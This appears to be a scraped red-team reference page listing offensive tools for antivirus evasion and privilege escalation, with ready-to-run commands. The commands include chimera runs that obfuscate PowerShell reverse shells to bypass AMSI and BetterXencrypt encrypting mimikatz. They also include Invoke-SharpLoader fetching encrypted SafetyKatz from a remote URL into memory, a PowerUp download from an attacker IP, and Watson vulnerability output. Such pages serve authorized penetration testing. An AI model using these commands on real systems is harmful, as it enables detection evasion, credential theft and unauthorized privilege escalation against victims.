Red Teaming
Malware Analysis
IoT / Reverse / Firmware
Privilege Escalation
1
/genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux x86 ./cross
Copied!
TheFatRat: TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.
Windows
DKMC: Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.
darkarmour: Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.
1
./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5
Copied!
​donut: Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
​chimera: Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
1
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e
2
​
3
# "cmd.exe" isn't a data type but when wrapped in double-quotes, this works
4
# https://www.sparknotes.com/lit/harrypotter/section1/
5
./chimera.sh -f shells/generic1.ps1 -l 2 -o /tmp/chimera.ps1 -v -t cmd.exe -c /tmp/harry_potter.txt -i -h -s getstream -b new-object -j -g -k -r -p
6
​
7
./chimera.sh -f shells/generic2.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s excePTIon.InneRexcePTIon.message,getstream -b invoke-expression,new-object -j -g -k -r -p
8
​
9
./chimera.sh -f shells/generic3.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s equals,split,getstream -b new-object -j -g -k -r -p
10
​
11
# short strings like `-s pwd` are prone to breaking scrips
12
./chimera.sh -f shells/powershell_reverse_shell.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,close,pwd,ascii,write -b iex,out-string,new-object -j -g -k -r -p
13
​
14
# nishang scripts
15
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
16
./chimera.sh -f shells/Invoke-PowerShellTcpOneLine.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,read -b while,new-object,iex -j -g -k -r -p
Copied!
​Invoke-Stealth: This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques.
​BetterXencrypt: A better version of Xencrypt.Xencrypt it self is a Powershell runtime crypter designed to evade AVs.
1
Encrypt C# file:
2
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
3
​
4
Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.
5
​
6
Load from URL:
7
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
8
​
9
Load from DISK:
10
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Copied!
1
Import-Module ./betterxencrypt.ps1
2
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Copied!
​Invoke-SharpLoader: Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.
​unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
1
python unicorn.py harmless.ps1
2
python unicorn.py myfile.ps1 macro
3
python unicorn.py muahahaha.ps1 macro 500
Copied!
Before.
After.
​PowerSploit: PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
1
powershell Invoke-WebRequest http://10.10.14.14/PowerUp.ps1 -OutFile PowerUp.ps1
2
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
Copied!
Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind.
1
C:\> Watson.exe
2
__ __ _
3
/ / /\ \ \__ _| |_ ___ ___ _ __
4
\ \/ \/ / _` | __/ __|/ _ \| '_ \
5
\ /\ / (_| | |_\__ \ (_) | | | |
6
\/ \/ \__,_|\__|___/\___/|_| |_|
7
​
8
v2.0
9
​
10
@_RastaMouse
11
​
12
[*] OS Build Number: 14393
13
[*] Enumerating installed KBs...
14
​
15
[!] CVE-2019-0836 : VULNERABLE
16
[>] https://exploit-db.com/exploits/46718
17
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
18
​
19
[!] CVE-2019-0841 : VULNERABLE
20
[>] https://github.com/rogue-kdc/CVE-2019-0841
21
[>] https://rastamouse.me/tags/cve-2019-0841/
22
​
23
[!] CVE-2019-1064 : VULNERABLE
24
[>] https://www.rythmstick.net/posts/cve-2019-1064/
25
​
26
[!] CVE-2019-1130 : VULNERABLE
27
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
Copied!
Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
JAWS: JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
1
accesschk.exe /accepteula
2
accesschk "power users" c:\windows\system32
3
accesschk.exe -uwcqv "Authenticated Users" *
4
accesschk.exe -uwqs Users c:\*.*
5
accesschk.exe -uwqs "Authenticated Users" c:\*.*
Copied!
​pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
​hollows_hunter: Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
SharpImpersonation Release | S3cur3Th1sSh1t
Linux
​gtfobins.github.io: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
1
/LinEnum.sh -s -k keyword -r report -e /tmp/ -t
Copied!
​
Last modified 6mo ago